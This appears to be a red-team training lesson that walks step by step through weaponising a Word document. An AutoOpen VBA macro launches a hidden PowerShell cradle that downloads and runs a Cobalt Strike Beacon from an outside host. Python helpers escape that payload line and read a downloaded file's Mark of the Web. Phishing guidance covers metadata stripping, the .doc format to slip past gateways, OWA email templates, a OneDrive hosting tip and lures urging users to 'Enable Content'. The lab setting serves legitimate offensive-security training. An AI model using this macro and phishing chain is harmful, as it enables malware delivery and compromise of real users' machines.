# Visual Basic for Applications (VBA) Macros

VBA is an implementation of Visual Basic embedded in the Microsoft Office applications, and it is very widely used to automate and extend Word and Excel, for example for data processing. The prevalence of macros in the commercial world is a double-edged sword when it comes to leveraging them for malicious purposes. On one hand, a document with embedded macros is not in itself suspicious; on the other, because macros *are* used by threat actors, they receive extra scrutiny both from technical controls (e.g. web/email gateways) and in security awareness training.

Launch Word on the Attacker Desktop.

You can create a macro in a Word document by going to *View > Macros*, which opens the Macros dialog. Change the "Macros in" field from "All active templates and documents" to "Document 1". Give the macro a name and click *Create*. To have the macro run automatically when the document is opened, name it *AutoOpen*: Word executes a macro with this name as soon as the document opens (once macros are enabled), with no further user interaction.

```
Sub AutoOpen()

  ' Word runs a macro named AutoOpen automatically when the document opens
  Dim Shell As Object
  ' Late-bind the Windows Script Host Shell COM object
  Set Shell = CreateObject("wscript.shell")
  ' Run an OS command; notepad is a harmless placeholder for testing
  Shell.Run "notepad"

End Sub
```

`wscript.shell` is the Shell COM object provided by the Windows Script Host, which is designed for automation. Its `Run` method executes an OS command, here launching Notepad. To test the above code, use the play/pause/stop buttons on the VBA editor toolbar; a Notepad window should appear.

![](https://files.cdn.thinkific.com/file_uploads/584845/images/0b4/ff5/673/wscript.png)

Next, we need to replace notepad with a Beacon payload. The easiest to leverage is the PowerShell payload. In Cobalt Strike, go to *Attacks > Scripted Web Delivery (S)* and generate a 64-bit PowerShell payload for your HTTP listener. The URI path can be anything, but I will keep it as */a*.

![](https://files.cdn.thinkific.com/file_uploads/584845/images/94e/ba0/32d/swd.png)

This will generate a PowerShell payload and host it on the team server so that it can be downloaded over HTTP and executed in-memory. After clicking *Launch*, Cobalt Strike will generate the PowerShell one-liner that will do just that.

![](https://files.cdn.thinkific.com/file_uploads/584845/images/5c5/5b6/77d/oneliner.png)

Copy/paste this line into the VBA in place of `"notepad"`. VBA string literals are delimited by double quotes and have no backslash escapes, so every double quote inside the one-liner (the pair around the IEX command) must be doubled (`""`) to be treated as a literal quote rather than the end of the string. The line should look like this:

```
Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))"""
```
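The quote-doubling rule is easy to get wrong by hand, particularly with longer cradles. The following helper, added here as an example and not part of the original page or of Cobalt Strike, builds the `Shell.Run` line from a command string and verifies it by decoding the VBA literal back into the original command. The one-liner embedded below is the page's own, with its example hostname; substitute your own listener host and URI.

```python
"""Build the VBA Shell.Run line from a PowerShell one-liner and verify it round-trips."""

from __future__ import annotations


def vba_string_literal(text: str) -> str:
    """Return TEXT as a VBA string literal.

    VBA delimits strings with double quotes and has no backslash escapes; the
    only way to embed a literal double quote is to write it twice.
    """
    return '"' + text.replace('"', '""') + '"'


def build_shell_run(command: str) -> str:
    """Return the VBA statement that runs COMMAND via the WScript.Shell object."""
    return "Shell.Run " + vba_string_literal(command)


def parse_vba_string_literal(literal: str) -> str:
    """Inverse of vba_string_literal: decode a VBA literal back to the raw text.

    Raises ValueError on an unterminated or otherwise malformed literal, which
    is what the VBA editor would reject as a syntax error.
    """
    if len(literal) < 2 or literal[0] != '"':
        raise ValueError("literal must start with a double quote")
    out = []
    i = 1
    while i < len(literal):
        ch = literal[i]
        if ch != '"':
            out.append(ch)
            i += 1
            continue
        # A doubled quote is a literal quote; a lone quote ends the string.
        if i + 1 < len(literal) and literal[i + 1] == '"':
            out.append('"')
            i += 2
        elif i == len(literal) - 1:
            return "".join(out)
        else:
            raise ValueError(f"unexpected closing quote at offset {i}")
    raise ValueError("unterminated string literal")


# The Scripted Web Delivery one-liner shown on the page (nickelviper.com is
# the course's example hostname; use your own listener host and URI).
ONE_LINER = (
    "powershell.exe -nop -w hidden -c "
    "\"IEX ((new-object net.webclient).downloadstring('http://nickelviper.com/a'))\""
)


def check_round_trip(command: str) -> bool:
    """True if encoding COMMAND as VBA and decoding it again yields COMMAND."""
    line = build_shell_run(command)
    literal = line[len("Shell.Run "):]
    return parse_vba_string_literal(literal) == command


if __name__ == "__main__":
    print(build_shell_run(ONE_LINER))
    print("round-trip ok:", check_round_trip(ONE_LINER))
```

Single quotes (around the URL) pass through untouched, since VBA does not treat them as string delimiters; only the double quotes need doubling, which is why the generated line ends in three of them.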

To prepare the document for delivery, go to *File > Info > Inspect Document > Inspect Document*, which will bring up the Document Inspector. Click *Inspect* and then *Remove All* next to *Document Properties and Personal Information*. This is to prevent the username on your system being embedded in the document.

Next, go to *File > Save As* and save it to *C:\Payloads*. Give it any filename, but in the *Save as type* dropdown, change the format from *.docx* to *Word 97-2003 (.doc)*. We do this because macros cannot be saved inside a `.docx`, and there is a stigma around the macro-enabled `.docm` extension (e.g. the thumbnail icon carries a large `!` and some web/email gateways block them entirely). I find that the legacy `.doc` extension is the best compromise.

We then want to upload this file to the team server as well. Go to *Site Management > Host File* and select your document.

![](https://files.cdn.thinkific.com/file_uploads/584845/images/087/4fa/7c4/host-file.png)

***

Even though the WYSIWYG text editor in OWA supports HTML, it's not very good for composing rich HTML-based emails. About the best it has are basic formatting options, but there is a bit of a hacky workaround and that is to use a pre-made HTML template. For example, [here](https://github.com/ZeroPointSecurity/PhishingTemplates/tree/master/Office365) are some HTML templates based around Office 365 (a copy can also be found in `C:\Tools\PhishingTemplates`). Open one of them, e.g. `Word.html` in Edge or another browser. Amazingly, what you can do is `Ctrl + A` and `Ctrl + C` to copy the content; and then `Ctrl + V` to paste it directly into the OWA text editor. All the text and image formatting should be preserved.

You can change the text placeholders and URL to the payload on lines [160](https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L160), [183](https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L183), [192](https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L192), [197](https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L197), and [207](https://github.com/ZeroPointSecurity/PhishingTemplates/blob/master/Office365/Word.html#L207). My payload URL will be *<http://nickelviper.com/ProductReport.doc>*.

In the real world, you could use a service such as OneDrive as this would provide you a more legitimate domain name to use.

![](https://files.cdn.thinkific.com/file_uploads/584845/images/c94/98a/87d/doc-phish.png)

***

Log into Workstation 2 as Bob, launch Outlook, and the email will arrive.

![](https://files.cdn.thinkific.com/file_uploads/584845/images/fd4/90c/b29/inbox.png)

Clicking the link will open Edge and automatically download the document. Because the file is downloaded via a browser, it is tagged with the Mark of the Web (MOTW): a `Zone.Identifier` alternate data stream on the file recording that it originated from the Internet zone. So, when opened, it will first be in Protected View.

![](https://files.cdn.thinkific.com/file_uploads/584845/images/00b/98d/4ad/protected-view.png)

The user must first click *Enable Editing* and then *Enable Content* to execute the macro. If you attach the document directly to the email, it will not have MOTW and therefore not open in Protected View.
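Whether a delivered document lands in Protected View can be checked from the file itself rather than by trial and error. The following example, added here and not part of the original page, parses the INI-style contents of the `Zone.Identifier` stream, maps the `ZoneId` to its URLMON zone name, and applies Office's default rule that files from the Internet and Restricted Sites zones open in Protected View. The two stream samples are constructed (the exact `ReferrerUrl`/`HostUrl` fields a browser writes vary by browser and version); `read_motw` reads the real stream on an NTFS volume under Windows and returns `None` anywhere the stream does not exist.

```python
"""Inspect a file's Mark of the Web (MOTW) and decide whether Word will open it in Protected View."""

from __future__ import annotations

from dataclasses import dataclass
from typing import Optional

# URLMON security zone identifiers as stored in the Zone.Identifier stream.
ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}


@dataclass
class MarkOfTheWeb:
    zone_id: int
    referrer_url: Optional[str] = None
    host_url: Optional[str] = None

    @property
    def zone_name(self) -> str:
        return ZONE_NAMES.get(self.zone_id, f"unknown ({self.zone_id})")

    @property
    def triggers_protected_view(self) -> bool:
        """Office's default 'files originating from the Internet' rule covers
        the Internet (3) and Restricted Sites (4) zones."""
        return self.zone_id >= 3


def parse_zone_identifier(stream: str) -> Optional[MarkOfTheWeb]:
    """Parse the INI-style text of a Zone.Identifier alternate data stream.

    Returns None if the stream carries no usable ZoneId, i.e. the file is not marked.
    """
    section = None
    fields: dict[str, str] = {}
    for raw in stream.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "zonetransfer" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip().lower()] = value.strip()
    if "zoneid" not in fields:
        return None
    try:
        zone_id = int(fields["zoneid"])
    except ValueError:
        return None
    return MarkOfTheWeb(zone_id, fields.get("referrerurl"), fields.get("hosturl"))


def read_motw(path: str) -> Optional[MarkOfTheWeb]:
    """Read the Zone.Identifier stream of PATH on NTFS (Windows only).

    Alternate data streams are addressed as 'file:stream'. A file that was never
    marked, or one on a non-NTFS volume, simply has no such stream.
    """
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except OSError:
        return None


# Constructed sample: the kind of stream Edge writes for a file downloaded from
# the page's payload URL.
EDGE_DOWNLOAD_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=http://nickelviper.com/\r\n"
    "HostUrl=http://nickelviper.com/ProductReport.doc\r\n"
)

# Constructed sample: a file copied from a share in the Local Intranet zone.
INTRANET_STREAM = "[ZoneTransfer]\r\nZoneId=1\r\n"


if __name__ == "__main__":
    for name, data in [("edge download", EDGE_DOWNLOAD_STREAM), ("intranet copy", INTRANET_STREAM)]:
        motw = parse_zone_identifier(data)
        print(f"{name}: zone={motw.zone_name}, protected view={motw.triggers_protected_view}")
```

On the Attacker Desktop, `read_motw(r"C:\Payloads\ProductReport.doc")` returns `None` for the freshly saved file, because nothing has marked it; the same call on the copy Edge downloads to Bob's workstation returns a zone 3 record, which is why that copy opens in Protected View.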

![](https://files.cdn.thinkific.com/file_uploads/584845/images/f56/95e/c92/enabled-content.png)

Many real-life samples try to entice the user to click this button, usually with a message along the lines of "Security Product XYZ has scanned the content and deemed it to be safe. To reveal the content, click Enable Content".

Once clicked, a PowerShell window will open briefly and then vanish. A new Beacon will appear in Cobalt Strike.

![](https://files.cdn.thinkific.com/file_uploads/584845/images/e2f/dc0/f3a/first-beacon.png)
